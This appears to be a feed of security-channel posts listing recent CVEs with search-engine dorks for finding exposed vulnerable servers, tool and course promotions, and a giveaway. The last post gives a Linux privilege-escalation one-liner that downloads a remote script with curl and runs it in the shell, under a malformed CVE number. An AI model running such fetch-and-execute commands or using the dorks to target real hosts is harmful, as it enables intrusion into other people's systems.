0day Hunters, Pay Attention!
CVE-2025-29927 - Next.js Middleware Auth Bypass [EXPLOIT]
Ever wondered what happens when middleware security checks fail silently? This vuln lets you slip past authentication like a ghost.
Reproduce it with Vulhub. Exploit it with Nuclei.
It's waiting in our Discord.
[Exploit Download]
Who wants a Spotify Premium 4-month coupon?
Drop your favorite hacking playlist, and the best one wins the coupon!
ExplainShell - Decode Shell Commands
Found a complex command in a PoC or exploit? Paste it into ExplainShell and see a breakdown of each argument.
Great for analyzing payloads, understanding Linux commands, and improving your skills.
Essential for Bug Bounty & Pentesting.
Dalfox v2.10.0 released! It uses way less CPU while XSS scanning even faster than before.
github.com/hahwul/dalfox
#DAST #Security #BugBounty
Unknown vulnerability in CrushFTP, no rating
The vulnerability allows attackers to gain unauthenticated access if any HTTP(S) port is exposed in the configuration.
Search at Netlas.io:
Link: https://nt.ls/tI4nF
Dork: http.headers.server:"CrushFTP"
Read more: https://www.rapid7.com/blog/post/2025/03/25/etr-notable-vulnerabilities-in-next-js-cve-2025-29927/
Best Fast Google Dork Scanner
https://github.com/IvanGlinkin/Fast-Google-Dorks-Scan
The OSINT project, the main idea of which is to collect all the possible Google dorks search combinations and to find the information about the specific web-site: common admin panels, the widesprea...
CVE-2025-30232: Use-after-free in Exim, "medium" rating
A vulnerability in some versions of Exim potentially allows an attacker to perform Privilege Escalation, if he has command line access.
Search at Netlas.io:
Link: https://nt.ls/mtDNc
Dork: smtp.banner:"Exim 4.96" OR smtp.banner:"Exim 4.97" OR smtp.banner:"Exim 4.98" OR smtp.banner:"Exim 4.98.1"
Vendor's advisory: https://exim.org/static/doc/security/CVE-2025-30232.txt
Your support keeps me motivated to share more valuable content! If you found this helpful, drop a like & send stars to help me keep going.
For queries, message me on Telegram: @wtf_brut
For course enrollment, reach out on WhatsApp: wa.link/brutsecurity
CVE-2025-1974: Improper Isolation or Compartmentalization in Kubernetes Ingress Controller, 9.8 rating
In some cases, an unauthenticated attacker may be able to execute remote code in the context of the ingress-nginx controller.
Search at Netlas.io:
Link: https://nt.ls/G6SC7
Dork: certificate.issuer_dn:"Kubernetes Ingress Controller"
Vendor's advisory: https://github.com/kubernetes/kubernetes/issues/131009
Ultimate Secret Scanner Regex Collection
30+ regex patterns to detect leaked credentials:
- API keys (Google, AWS, Stripe)
- Auth tokens (OAuth, JWT)
- Private keys (RSA, PGP)
- Emails, URLs, UUIDs
https://github.com/Lu3ky13/Search-for-all-leaked-keys-secrets-using-one-regex-/tree/main
#bugbounty #bugbountytip
Google Dorks that can be used for penetration testing, security research, and information gathering.
https://github.com/yogsec/Pen-Testing-Google-Dorks
Web Pentesting & Bug Bounty Batch - Starting April!
Master Web Penetration Testing with a Bug Bounty Approach in our new batch starting this April! Learn real-world attack scenarios, exploitation techniques, and defense strategies.
- Weekday & Weekend Batches - Evening Slots (IST)
- Hands-on Labs & Live Automations
- Bug Bounty Methodologies & Practical Hunting
- Community Support & Private POC Access
Limited slots! Enroll now and take your hacking skills to the next level.
DM https://wa.link/brutsecurity for details! (https://wa.me/+918945971332)
On this special occasion, we extend our warmest wishes to all who celebrate Eid. May this day bring you joy, peace, and prosperity.
At Brut Security, we value diversity and unity, and we appreciate each and every member of our community. Whether you're celebrating or simply sharing in the happiness of others, we hope today is filled with kindness and togetherness.
Stay curious, stay secure, and keep learning!
CVE-2025-2294: Path Traversal in Kubio WordPress plugin, 9.8 rating
A vulnerability found in a popular plugin allows unauthenticated attackers to execute any code in PHP files on the server.
Search at Netlas.io:
Link: https://nt.ls/iOqr6
Dork: http.body:"plugins/kubio"
Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kubio/kubio-ai-page-builder-251-unauthenticated-local-file-inclusion
CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):
". <(curl -SsfL https://thc.org/7350pipe)"